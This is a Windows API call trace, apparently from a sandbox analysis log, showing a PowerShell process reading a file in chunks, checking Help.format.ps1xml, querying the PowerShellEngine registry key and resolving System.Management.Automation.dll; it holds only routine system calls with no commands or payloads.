	[0225.132] ReadFile (in: hFile=0x35c, lpBuffer=0x2dd976c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10ea34, lpOverlapped=0x0 | out: lpBuffer=0x2dd976c*, lpNumberOfBytesRead=0x10ea34*=0x1000, lpOverlapped=0x0) returned 1
	[0225.133] GetLastError () returned 0x0
	[0225.133] ReadFile (in: hFile=0x35c, lpBuffer=0x2dd976c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10ea34, lpOverlapped=0x0 | out: lpBuffer=0x2dd976c*, lpNumberOfBytesRead=0x10ea34*=0x1000, lpOverlapped=0x0) returned 1
	[0225.133] GetLastError () returned 0x0
	[0225.133] ReadFile (in: hFile=0x35c, lpBuffer=0x2dd976c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10ea34, lpOverlapped=0x0 | out: lpBuffer=0x2dd976c*, lpNumberOfBytesRead=0x10ea34*=0x1000, lpOverlapped=0x0) returned 1
	[0225.133] GetLastError () returned 0x0
	[0225.133] ReadFile (in: hFile=0x35c, lpBuffer=0x2dd976c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10ea34, lpOverlapped=0x0 | out: lpBuffer=0x2dd976c*, lpNumberOfBytesRead=0x10ea34*=0x1000, lpOverlapped=0x0) returned 1
	[0225.133] GetLastError () returned 0x0
	[0225.133] ReadFile (in: hFile=0x35c, lpBuffer=0x2dd976c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10ea34, lpOverlapped=0x0 | out: lpBuffer=0x2dd976c*, lpNumberOfBytesRead=0x10ea34*=0x1000, lpOverlapped=0x0) returned 1
	[0225.133] GetLastError () returned 0x0
	[0225.133] ReadFile (in: hFile=0x35c, lpBuffer=0x2dd976c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10ea34, lpOverlapped=0x0 | out: lpBuffer=0x2dd976c*, lpNumberOfBytesRead=0x10ea34*=0x1000, lpOverlapped=0x0) returned 1
	[0225.133] GetLastError () returned 0x0
	[0225.135] ReadFile (in: hFile=0x35c, lpBuffer=0x2dd976c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10ea34, lpOverlapped=0x0 | out: lpBuffer=0x2dd976c*, lpNumberOfBytesRead=0x10ea34*=0x1000, lpOverlapped=0x0) returned 1
	[0225.135] GetLastError () returned 0x0
	[0225.135] ReadFile (in: hFile=0x35c, lpBuffer=0x2dd976c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10ea34, lpOverlapped=0x0 | out: lpBuffer=0x2dd976c*, lpNumberOfBytesRead=0x10ea34*=0x1000, lpOverlapped=0x0) returned 1
	[0225.135] GetLastError () returned 0x0
	[0225.135] ReadFile (in: hFile=0x35c, lpBuffer=0x2dd976c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10ea34, lpOverlapped=0x0 | out: lpBuffer=0x2dd976c*, lpNumberOfBytesRead=0x10ea34*=0x1000, lpOverlapped=0x0) returned 1
	[0225.135] GetLastError () returned 0x0
	[0225.136] ReadFile (in: hFile=0x35c, lpBuffer=0x2dd976c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10ea34, lpOverlapped=0x0 | out: lpBuffer=0x2dd976c*, lpNumberOfBytesRead=0x10ea34*=0x1000, lpOverlapped=0x0) returned 1
	[0225.136] GetLastError () returned 0x0
	[0225.136] ReadFile (in: hFile=0x35c, lpBuffer=0x2dd976c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10ea34, lpOverlapped=0x0 | out: lpBuffer=0x2dd976c*, lpNumberOfBytesRead=0x10ea34*=0x1000, lpOverlapped=0x0) returned 1
	[0225.136] GetLastError () returned 0x0
	[0225.136] ReadFile (in: hFile=0x35c, lpBuffer=0x2dd976c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10ea34, lpOverlapped=0x0 | out: lpBuffer=0x2dd976c*, lpNumberOfBytesRead=0x10ea34*=0x1000, lpOverlapped=0x0) returned 1
	[0225.136] GetLastError () returned 0x0
	[0225.136] ReadFile (in: hFile=0x35c, lpBuffer=0x2dd976c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10ea34, lpOverlapped=0x0 | out: lpBuffer=0x2dd976c*, lpNumberOfBytesRead=0x10ea34*=0x1000, lpOverlapped=0x0) returned 1
	[0225.137] GetLastError () returned 0x0
	[0225.137] ReadFile (in: hFile=0x35c, lpBuffer=0x2dd976c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10ea34, lpOverlapped=0x0 | out: lpBuffer=0x2dd976c*, lpNumberOfBytesRead=0x10ea34*=0x1000, lpOverlapped=0x0) returned 1
	[0225.137] GetLastError () returned 0x0
	[0225.139] ReadFile (in: hFile=0x35c, lpBuffer=0x2dd976c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10ea34, lpOverlapped=0x0 | out: lpBuffer=0x2dd976c*, lpNumberOfBytesRead=0x10ea34*=0x1000, lpOverlapped=0x0) returned 1
	[0225.139] GetLastError () returned 0x0
	[0225.139] ReadFile (in: hFile=0x35c, lpBuffer=0x2dd976c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10ea34, lpOverlapped=0x0 | out: lpBuffer=0x2dd976c*, lpNumberOfBytesRead=0x10ea34*=0x1000, lpOverlapped=0x0) returned 1
	[0225.139] GetLastError () returned 0x0
	[0225.140] ReadFile (in: hFile=0x35c, lpBuffer=0x2dd976c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10ea34, lpOverlapped=0x0 | out: lpBuffer=0x2dd976c*, lpNumberOfBytesRead=0x10ea34*=0x1000, lpOverlapped=0x0) returned 1
	[0225.140] GetLastError () returned 0x0
	[0225.140] ReadFile (in: hFile=0x35c, lpBuffer=0x2dd976c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10ea34, lpOverlapped=0x0 | out: lpBuffer=0x2dd976c*, lpNumberOfBytesRead=0x10ea34*=0x1000, lpOverlapped=0x0) returned 1
	[0225.140] GetLastError () returned 0x0
	[0225.140] ReadFile (in: hFile=0x35c, lpBuffer=0x2dd976c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10ea34, lpOverlapped=0x0 | out: lpBuffer=0x2dd976c*, lpNumberOfBytesRead=0x10ea34*=0x1000, lpOverlapped=0x0) returned 1
	[0225.140] GetLastError () returned 0x0
	[0225.140] ReadFile (in: hFile=0x35c, lpBuffer=0x2dd976c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10ea34, lpOverlapped=0x0 | out: lpBuffer=0x2dd976c*, lpNumberOfBytesRead=0x10ea34*=0x1000, lpOverlapped=0x0) returned 1
	[0225.140] GetLastError () returned 0x0
	[0225.141] ReadFile (in: hFile=0x35c, lpBuffer=0x2dd976c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10ea34, lpOverlapped=0x0 | out: lpBuffer=0x2dd976c*, lpNumberOfBytesRead=0x10ea34*=0x1000, lpOverlapped=0x0) returned 1
	[0225.141] GetLastError () returned 0x0
	[0225.141] ReadFile (in: hFile=0x35c, lpBuffer=0x2dd976c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10ea34, lpOverlapped=0x0 | out: lpBuffer=0x2dd976c*, lpNumberOfBytesRead=0x10ea34*=0x1000, lpOverlapped=0x0) returned 1
	[0225.141] GetLastError () returned 0x0
	[0225.141] ReadFile (in: hFile=0x35c, lpBuffer=0x2dd976c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10ea34, lpOverlapped=0x0 | out: lpBuffer=0x2dd976c*, lpNumberOfBytesRead=0x10ea34*=0x1000, lpOverlapped=0x0) returned 1
	[0225.141] GetLastError () returned 0x0
	[0225.141] ReadFile (in: hFile=0x35c, lpBuffer=0x2dd976c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10ea34, lpOverlapped=0x0 | out: lpBuffer=0x2dd976c*, lpNumberOfBytesRead=0x10ea34*=0x1000, lpOverlapped=0x0) returned 1
	[0225.141] GetLastError () returned 0x0
	[0225.141] ReadFile (in: hFile=0x35c, lpBuffer=0x2dd976c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10ea34, lpOverlapped=0x0 | out: lpBuffer=0x2dd976c*, lpNumberOfBytesRead=0x10ea34*=0x1000, lpOverlapped=0x0) returned 1
	[0225.142] GetLastError () returned 0x0
	[0225.142] ReadFile (in: hFile=0x35c, lpBuffer=0x2dd976c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10ea34, lpOverlapped=0x0 | out: lpBuffer=0x2dd976c*, lpNumberOfBytesRead=0x10ea34*=0x1000, lpOverlapped=0x0) returned 1
	[0225.142] GetLastError () returned 0x0
	[0225.142] ReadFile (in: hFile=0x35c, lpBuffer=0x2dd976c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10ea34, lpOverlapped=0x0 | out: lpBuffer=0x2dd976c*, lpNumberOfBytesRead=0x10ea34*=0x1000, lpOverlapped=0x0) returned 1
	[0225.142] GetLastError () returned 0x0
	[0225.142] ReadFile (in: hFile=0x35c, lpBuffer=0x2dd976c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10ea34, lpOverlapped=0x0 | out: lpBuffer=0x2dd976c*, lpNumberOfBytesRead=0x10ea34*=0x1000, lpOverlapped=0x0) returned 1
	[0225.142] GetLastError () returned 0x0
	[0225.142] ReadFile (in: hFile=0x35c, lpBuffer=0x2dd976c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10ea34, lpOverlapped=0x0 | out: lpBuffer=0x2dd976c*, lpNumberOfBytesRead=0x10ea34*=0x1000, lpOverlapped=0x0) returned 1
	[0225.142] GetLastError () returned 0x0
	[0225.143] ReadFile (in: hFile=0x35c, lpBuffer=0x2dd976c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10ea34, lpOverlapped=0x0 | out: lpBuffer=0x2dd976c*, lpNumberOfBytesRead=0x10ea34*=0x1000, lpOverlapped=0x0) returned 1
	[0225.143] GetLastError () returned 0x0
	[0225.147] ReadFile (in: hFile=0x35c, lpBuffer=0x2dd976c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10ea34, lpOverlapped=0x0 | out: lpBuffer=0x2dd976c*, lpNumberOfBytesRead=0x10ea34*=0x1000, lpOverlapped=0x0) returned 1
	[0225.147] GetLastError () returned 0x0
	[0225.147] ReadFile (in: hFile=0x35c, lpBuffer=0x2dd976c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10ea34, lpOverlapped=0x0 | out: lpBuffer=0x2dd976c*, lpNumberOfBytesRead=0x10ea34*=0x1000, lpOverlapped=0x0) returned 1
	[0225.148] GetLastError () returned 0x0
	[0225.148] ReadFile (in: hFile=0x35c, lpBuffer=0x2dd976c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10ea34, lpOverlapped=0x0 | out: lpBuffer=0x2dd976c*, lpNumberOfBytesRead=0x10ea34*=0x1000, lpOverlapped=0x0) returned 1
	[0225.148] GetLastError () returned 0x0
	[0225.148] ReadFile (in: hFile=0x35c, lpBuffer=0x2dd976c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10ea34, lpOverlapped=0x0 | out: lpBuffer=0x2dd976c*, lpNumberOfBytesRead=0x10ea34*=0x1000, lpOverlapped=0x0) returned 1
	[0225.148] GetLastError () returned 0x0
	[0225.149] ReadFile (in: hFile=0x35c, lpBuffer=0x2dd976c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10ea34, lpOverlapped=0x0 | out: lpBuffer=0x2dd976c*, lpNumberOfBytesRead=0x10ea34*=0x1000, lpOverlapped=0x0) returned 1
	[0225.149] GetLastError () returned 0x0
	[0225.149] ReadFile (in: hFile=0x35c, lpBuffer=0x2dd976c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10ea34, lpOverlapped=0x0 | out: lpBuffer=0x2dd976c*, lpNumberOfBytesRead=0x10ea34*=0x1000, lpOverlapped=0x0) returned 1
	[0225.149] GetLastError () returned 0x0
	[0225.149] ReadFile (in: hFile=0x35c, lpBuffer=0x2dd976c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10ea34, lpOverlapped=0x0 | out: lpBuffer=0x2dd976c*, lpNumberOfBytesRead=0x10ea34*=0x1000, lpOverlapped=0x0) returned 1
	[0225.149] GetLastError () returned 0x0
	[0225.149] ReadFile (in: hFile=0x35c, lpBuffer=0x2dd976c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10ea34, lpOverlapped=0x0 | out: lpBuffer=0x2dd976c*, lpNumberOfBytesRead=0x10ea34*=0x1000, lpOverlapped=0x0) returned 1
	[0225.149] GetLastError () returned 0x0
	[0225.150] ReadFile (in: hFile=0x35c, lpBuffer=0x2dd976c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10ea34, lpOverlapped=0x0 | out: lpBuffer=0x2dd976c*, lpNumberOfBytesRead=0x10ea34*=0x1000, lpOverlapped=0x0) returned 1
	[0225.150] GetLastError () returned 0x0
	[0225.150] ReadFile (in: hFile=0x35c, lpBuffer=0x2dd976c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10ea34, lpOverlapped=0x0 | out: lpBuffer=0x2dd976c*, lpNumberOfBytesRead=0x10ea34*=0x1000, lpOverlapped=0x0) returned 1
	[0225.150] GetLastError () returned 0x0
	[0225.150] ReadFile (in: hFile=0x35c, lpBuffer=0x2dd976c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10ea34, lpOverlapped=0x0 | out: lpBuffer=0x2dd976c*, lpNumberOfBytesRead=0x10ea34*=0x1000, lpOverlapped=0x0) returned 1
	[0225.150] GetLastError () returned 0x0
	[0225.150] ReadFile (in: hFile=0x35c, lpBuffer=0x2dd976c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10ea34, lpOverlapped=0x0 | out: lpBuffer=0x2dd976c*, lpNumberOfBytesRead=0x10ea34*=0x1000, lpOverlapped=0x0) returned 1
	[0225.150] GetLastError () returned 0x0
	[0225.151] ReadFile (in: hFile=0x35c, lpBuffer=0x2dd976c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10ea34, lpOverlapped=0x0 | out: lpBuffer=0x2dd976c*, lpNumberOfBytesRead=0x10ea34*=0x1000, lpOverlapped=0x0) returned 1
	[0225.151] GetLastError () returned 0x0
	[0225.151] ReadFile (in: hFile=0x35c, lpBuffer=0x2dd976c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10ea34, lpOverlapped=0x0 | out: lpBuffer=0x2dd976c*, lpNumberOfBytesRead=0x10ea34*=0x1000, lpOverlapped=0x0) returned 1
	[0225.151] GetLastError () returned 0x0
	[0225.151] ReadFile (in: hFile=0x35c, lpBuffer=0x2dd976c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10ea34, lpOverlapped=0x0 | out: lpBuffer=0x2dd976c*, lpNumberOfBytesRead=0x10ea34*=0x1000, lpOverlapped=0x0) returned 1
	[0225.151] GetLastError () returned 0x0
	[0225.151] ReadFile (in: hFile=0x35c, lpBuffer=0x2dd976c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10ea34, lpOverlapped=0x0 | out: lpBuffer=0x2dd976c*, lpNumberOfBytesRead=0x10ea34*=0x1000, lpOverlapped=0x0) returned 1
	[0225.151] GetLastError () returned 0x0
	[0225.152] ReadFile (in: hFile=0x35c, lpBuffer=0x2dd976c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10ea34, lpOverlapped=0x0 | out: lpBuffer=0x2dd976c*, lpNumberOfBytesRead=0x10ea34*=0x1000, lpOverlapped=0x0) returned 1
	[0225.152] GetLastError () returned 0x0
	[0225.152] ReadFile (in: hFile=0x35c, lpBuffer=0x2dd976c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10ea34, lpOverlapped=0x0 | out: lpBuffer=0x2dd976c*, lpNumberOfBytesRead=0x10ea34*=0x1000, lpOverlapped=0x0) returned 1
	[0225.152] GetLastError () returned 0x0
	[0225.152] ReadFile (in: hFile=0x35c, lpBuffer=0x2dd976c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10ea34, lpOverlapped=0x0 | out: lpBuffer=0x2dd976c*, lpNumberOfBytesRead=0x10ea34*=0x1000, lpOverlapped=0x0) returned 1
	[0225.152] GetLastError () returned 0x0
	[0225.152] ReadFile (in: hFile=0x35c, lpBuffer=0x2dd976c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10ea34, lpOverlapped=0x0 | out: lpBuffer=0x2dd976c*, lpNumberOfBytesRead=0x10ea34*=0x1000, lpOverlapped=0x0) returned 1
	[0225.152] GetLastError () returned 0x0
	[0225.153] ReadFile (in: hFile=0x35c, lpBuffer=0x2dd976c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10ea34, lpOverlapped=0x0 | out: lpBuffer=0x2dd976c*, lpNumberOfBytesRead=0x10ea34*=0x1000, lpOverlapped=0x0) returned 1
	[0225.153] GetLastError () returned 0x0
	[0225.153] ReadFile (in: hFile=0x35c, lpBuffer=0x2dd976c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10ea34, lpOverlapped=0x0 | out: lpBuffer=0x2dd976c*, lpNumberOfBytesRead=0x10ea34*=0x1000, lpOverlapped=0x0) returned 1
	[0225.153] GetLastError () returned 0x0
	[0225.153] ReadFile (in: hFile=0x35c, lpBuffer=0x2dd976c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10ea34, lpOverlapped=0x0 | out: lpBuffer=0x2dd976c*, lpNumberOfBytesRead=0x10ea34*=0x1000, lpOverlapped=0x0) returned 1
	[0225.153] GetLastError () returned 0x0
	[0225.153] ReadFile (in: hFile=0x35c, lpBuffer=0x2dd976c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10ea34, lpOverlapped=0x0 | out: lpBuffer=0x2dd976c*, lpNumberOfBytesRead=0x10ea34*=0x1000, lpOverlapped=0x0) returned 1
	[0225.153] GetLastError () returned 0x0
	[0225.154] ReadFile (in: hFile=0x35c, lpBuffer=0x2dd976c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10ea34, lpOverlapped=0x0 | out: lpBuffer=0x2dd976c*, lpNumberOfBytesRead=0x10ea34*=0x1000, lpOverlapped=0x0) returned 1
	[0225.154] GetLastError () returned 0x0
	[0225.154] ReadFile (in: hFile=0x35c, lpBuffer=0x2dd976c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10ea34, lpOverlapped=0x0 | out: lpBuffer=0x2dd976c*, lpNumberOfBytesRead=0x10ea34*=0x1000, lpOverlapped=0x0) returned 1
	[0225.154] GetLastError () returned 0x0
	[0225.154] ReadFile (in: hFile=0x35c, lpBuffer=0x2dd976c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10ea34, lpOverlapped=0x0 | out: lpBuffer=0x2dd976c*, lpNumberOfBytesRead=0x10ea34*=0x1000, lpOverlapped=0x0) returned 1
	[0225.154] GetLastError () returned 0x0
	[0225.154] ReadFile (in: hFile=0x35c, lpBuffer=0x2dd976c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10ea34, lpOverlapped=0x0 | out: lpBuffer=0x2dd976c*, lpNumberOfBytesRead=0x10ea34*=0x1000, lpOverlapped=0x0) returned 1
	[0225.154] GetLastError () returned 0x0
	[0225.155] ReadFile (in: hFile=0x35c, lpBuffer=0x2dd976c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10ea34, lpOverlapped=0x0 | out: lpBuffer=0x2dd976c*, lpNumberOfBytesRead=0x10ea34*=0x1000, lpOverlapped=0x0) returned 1
	[0225.155] GetLastError () returned 0x0
	[0225.155] ReadFile (in: hFile=0x35c, lpBuffer=0x2dd976c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10ea34, lpOverlapped=0x0 | out: lpBuffer=0x2dd976c*, lpNumberOfBytesRead=0x10ea34*=0x1000, lpOverlapped=0x0) returned 1
	[0225.155] GetLastError () returned 0x0
	[0225.155] ReadFile (in: hFile=0x35c, lpBuffer=0x2dd976c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10ea34, lpOverlapped=0x0 | out: lpBuffer=0x2dd976c*, lpNumberOfBytesRead=0x10ea34*=0xf37, lpOverlapped=0x0) returned 1
	[0225.155] GetLastError () returned 0x0
	[0225.155] ReadFile (in: hFile=0x35c, lpBuffer=0x2dd8e43, nNumberOfBytesToRead=0xc9, lpNumberOfBytesRead=0x10ea34, lpOverlapped=0x0 | out: lpBuffer=0x2dd8e43*, lpNumberOfBytesRead=0x10ea34*=0x0, lpOverlapped=0x0) returned 1
	[0225.155] GetLastError () returned 0x0
	[0225.156] ReadFile (in: hFile=0x35c, lpBuffer=0x2dd976c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10ea34, lpOverlapped=0x0 | out: lpBuffer=0x2dd976c*, lpNumberOfBytesRead=0x10ea34*=0x0, lpOverlapped=0x0) returned 1
	[0225.156] GetLastError () returned 0x0
	[0225.156] CloseHandle (hObject=0x35c) returned 1
	[0225.156] GetLastError () returned 0x0
	[0225.156] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0x10e594, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d
	[0225.156] GetLastError () returned 0x0
	[0225.156] SetErrorMode (uMode=0x1) returned 0x1
	[0225.156] GetFileAttributesExW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Help.format.ps1xml" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\help.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x2dfa768 | out: lpFileInformation=0x2dfa768*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5a11027b, ftCreationTime.dwHighDateTime=0x1ca03f9, ftLastAccessTime.dwLowDateTime=0x5a11027b, ftLastAccessTime.dwHighDateTime=0x1ca03f9, ftLastWriteTime.dwLowDateTime=0xd2ed081c, ftLastWriteTime.dwHighDateTime=0x1c9ea11, nFileSizeHigh=0x0, nFileSizeLow=0x3ef37)) returned 1
	[0225.156] GetLastError () returned 0x0
	[0225.156] SetErrorMode (uMode=0x1) returned 0x1
	[0225.156] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0x10e560, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d
	[0225.156] GetLastError () returned 0x0
	[0225.156] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x10e9b8 | out: phkResult=0x10e9b8*=0x35c) returned 0x0
	[0225.157] RegQueryValueExW (in: hKey=0x35c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x10ea00, lpData=0x0, lpcbData=0x10e9fc*=0x0 | out: lpType=0x10ea00*=0x1, lpData=0x0, lpcbData=0x10e9fc*=0x56) returned 0x0
	[0225.157] RegQueryValueExW (in: hKey=0x35c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x10ea00, lpData=0x5090b0, lpcbData=0x10e9fc*=0x56 | out: lpType=0x10ea00*=0x1, lpData="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0", lpcbData=0x10e9fc*=0x56) returned 0x0
	[0225.157] RegCloseKey (hKey=0x35c) returned 0x0
	[0225.157] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0x10e560, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d
	[0225.157] GetLastError () returned 0x0
	[0225.157] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0x10e4f4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d
	[0225.157] GetLastError () returned 0x0
	[0225.168] CoCreateGuid (in: pguid=0x10ea28 | out: pguid=0x10ea28*(Data1=0xd1c96ae7, Data2=0xfb80, Data3=0x44bf, Data4=([0]=0xa5, [1]=0x90, [2]=0x82, [3]=0xc0, [4]=0xd8, [5]=0x40, [6]=0xe4, [7]=0x18))) returned 0x0
	[0225.168] CoCreateGuid (in: pguid=0x10ea28 | out: pguid=0x10ea28*(Data1=0x4b927b43, Data2=0x2326, Data3=0x4e4e, Data4=([0]=0xb6, [1]=0xd, [2]=0x22, [3]=0xbf, [4]=0x18, [5]=0xe9, [6]=0x65, [7]=0x91))) returned 0x0
	[0225.169] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10e2d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0225.169] GetLastError () returned 0x0
	[0225.169] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10e280, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0225.169] GetLastError () returned 0x0
	[0225.169] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10e280, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0225.169] GetLastError () returned 0x0
	[0225.169] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10e280, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0225.169] GetLastError () returned 0x0
	[0225.290] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10e2d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0225.290] GetLastError () returned 0x0
	[0225.290] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10e280, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0225.290] GetLastError () returned 0x0
	[0225.290] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10e280, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0225.290] GetLastError () returned 0x0
	[0225.290] CoCreateGuid (in: pguid=0x10ea28 | out: pguid=0x10ea28*(Data1=0x86c88924, Data2=0x781e, Data3=0x47f2, Data4=([0]=0xbe, [1]=0xaa, [2]=0xe, [3]=0x6a, [4]=0x6, [5]=0x65, [6]=0xf, [7]=0xb2))) returned 0x0
	[0225.290] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10e138, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0225.290] GetLastError () returned 0x0
